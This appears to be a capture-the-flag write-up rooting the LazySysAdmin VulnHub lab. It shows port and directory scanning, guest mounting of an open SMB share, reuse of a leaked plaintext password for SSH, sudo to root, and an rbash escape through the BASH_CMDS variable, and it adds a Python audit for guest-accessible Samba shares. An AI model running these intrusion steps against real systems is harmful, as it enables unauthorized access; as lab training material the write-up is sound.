
Quick write-up of LazySysAdmin, found here: https://www.vulnhub.com/entry/lazysysadmin-1,205/
This is labeled as “beginner-intermediate” but probably leaning more on the beginner side. Anyhow…let’s do this!
Basic nmap scan…
root@kali:~/vulnhub/lazysysadmin# nmap -sS -sV 172.16.115.134 -oA lazy

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 00:08 EST
Nmap scan report for 172.16.115.134
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CE:7D:7F (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
Check the basics…
root@kali:~/vulnhub/lazysysadmin# curl http://172.16.115.134/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
Checking those directories yields nothing of interest…moving on. Let’s do a quick directory brute-force.
root@kali:~/vulnhub/lazysysadmin# gobuster -u http://172.16.115.134 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.115.134/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://172.16.115.134/.htpasswd (Status: 403)
http://172.16.115.134/.hta (Status: 403)
http://172.16.115.134/.htaccess (Status: 403)
http://172.16.115.134/apache (Status: 301)
http://172.16.115.134/index.html (Status: 200)
http://172.16.115.134/info.php (Status: 200)
http://172.16.115.134/javascript (Status: 301)
http://172.16.115.134/old (Status: 301)
http://172.16.115.134/phpmyadmin (Status: 301)
http://172.16.115.134/robots.txt (Status: 200)
http://172.16.115.134/server-status (Status: 403)
http://172.16.115.134/test (Status: 301)
http://172.16.115.134/wordpress (Status: 301)
http://172.16.115.134/wp (Status: 301)
=====================================================
WordPress, phpinfo, phpmyadmin…noted. Let’s see what else we can find on this box. We saw TCP 139 and 445 open. Let’s probe them with enum4linux.
root@kali:~/vulnhub/lazysysadmin# enum4linux 172.16.115.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov  6 00:39:14 2017

 ==========================
|    Target Information    |
 ==========================
Target ........... 172.16.115.134
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ======================================================
|    Enumerating Workgroup/Domain on 172.16.115.134    |
 ======================================================
[+] Got domain/workgroup name: WORKGROUP

[...SNIP...]

 ===========================================
|    Share Enumeration on 172.16.115.134    |
 ===========================================
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk      Sumshare
        IPC$            IPC       IPC Service (Web server)

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAZYSYSADMIN

[+] Attempting to map shares on 172.16.115.134
//172.16.115.134/print$   Mapping: DENIED, Listing: N/A
//172.16.115.134/share$   Mapping: OK, Listing: OK
//172.16.115.134/IPC$     Mapping: OK Listing: DENIED

[...SNIP...]

S-1-22-1-1000 Unix User\togie (Local User)
Well…that looks interesting. Leaving a misconfigured share is something a Lazy Sys Admin might do. We also have a local user named “togie.” Let’s see what we can find in the share.
First, we mount the share, and then start poking around…
root@kali:~/vulnhub/lazysysadmin# mkdir /mnt/cifs
root@kali:~/vulnhub/lazysysadmin# mount -t cifs //172.16.115.134/share$ -o username=guest /mnt/cifs/
root@kali:~/vulnhub/lazysysadmin# ls /mnt/cifs/
Backnode_files  apache  deets.txt  index.html  info.php  old  robots.txt  test  todolist.txt  wordpress  wp
root@kali:~/vulnhub/lazysysadmin# cat /mnt/cifs/deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
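As an added example (my own code, not from the VM or this write-up), here is a small Python audit for the misconfiguration behind share$: it parses an smb.conf and reports every share that can be mapped without credentials, which is exactly what let a guest mount and read the share above. The smb.conf text is constructed to mirror the box; the fix is guest ok = no on the share (and map to guest = Never globally) unless anonymous access is really intended.

```python
import re
from typing import Dict, List, Tuple
# Constructed sample smb.conf (not the VM's real config): share$ is mappable
# by anyone, like the "Sumshare" share enum4linux listed above.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
[share$]
   comment = Sumshare
   path = /var/www/html
   guest ok = yes
   writable = yes
"""
def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {lowercased key: value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:                                   # new [section] header
            current = m.group(1).strip()
            sections[current] = {}
        elif current is not None and "=" in line and line[0] not in "#;":
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def _yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")

def audit_guest_shares(text: str) -> List[Tuple[str, str]]:
    """Return (share, finding) for each share reachable without credentials."""
    conf = parse_smb_conf(text)
    map_guest = conf.get("global", {}).get("map to guest", "never").lower() != "never"
    findings = []
    for name, opts in conf.items():
        # 'public' is a synonym of 'guest ok'; both default to no.
        if name == "global" or not _yes(opts.get("guest ok", opts.get("public", "no"))):
            continue
        # 'writable'/'writeable' invert 'read only', which defaults to yes.
        writable = _yes(opts.get("writable", opts.get("writeable", "no"))) or \
            opts.get("read only", "yes").strip().lower() in ("no", "false", "0")
        finding = "guest-readable" + (", guest-writable" if writable else "")
        if map_guest:
            finding += "; failed logins are mapped to the guest account"
        findings.append((name, finding))
    return findings
```

Run it against /etc/samba/smb.conf on a server and anything it returns is a share that enum4linux will show as "Mapping: OK" for a null session.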
Surely, 12345 can’t be a real user’s password? How about a lazy sysadmin’s password? Let’s try it with the user we found earlier…
root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                  Welcome to Web_TR1                                            #
#                        All connections are monitored and recorded                              #
#                 Disconnect IMMEDIATELY if you are not an authorized user!                      #
##################################################################################################
togie@172.16.115.134's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Nov  6 16:01:52 AEST 2017

  System load:  0.0               Processes:           179
  Usage of /:   46.1% of 2.89GB   Users logged in:     0
  Memory usage: 33%               IP address for eth0: 172.16.115.134
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
/facepalm
Ok…now we’re in as togie. Does this user have sudo access?
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie#
root@LazySysAdmin:/home/togie# ls /root
proof.txt
root@LazySysAdmin:/home/togie# cat /root/proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)

Hope you learn't a few things along the way.

Regards,
Togie Mcdogie

Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
/doublefacepalm…apparently it does. Game over!
There were a few rabbit holes you could’ve gone down on this VM. One being that if you didn’t try for sudo access right away, you would’ve noticed that togie was configured to use /bin/rbash, or “restricted bash,” which prevents you from running certain commands.
togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash
One easy way I’ve found to escape rbash relies on a bug in which the BASH_CMDS shell variable (the associative array behind bash’s command hash table, mapping command names to the paths they resolve to) is writable from inside a restricted shell. I stumbled across this in my OSCP travels, and my inner 12 year-old appreciates it because I get to call it the “poop” vulnerability. See why: https://lists.gnu.org/archive/html/bug-bash/2017-03/msg00076.html
Anyhow…if we execute what is shown in the link, we confirm that we can escape rbash.
root@kali:~/vulnhub/lazysysadmin# ssh togie@172.16.115.134
##################################################################################################
#                                  Welcome to Web_TR1                                            #
#                        All connections are monitored and recorded                              #
#                 Disconnect IMMEDIATELY if you are not an authorized user!                      #
##################################################################################################
togie@172.16.115.134's password:
[...SNIP...]
togie@LazySysAdmin:~$ cd /tmp
-rbash: cd: restricted
togie@LazySysAdmin:~$ BASH_CMDS[poop]=/bin/bash
togie@LazySysAdmin:~$ poop
togie@LazySysAdmin:~$ cd /tmp
togie@LazySysAdmin:/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt  2 root root 4.0K Nov  6 16:17 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 21 20:10 ..
I didn’t experiment with any other methods of privilege escalation, but I suspect there’s one more…perhaps if I have time, I’ll go back and check it out.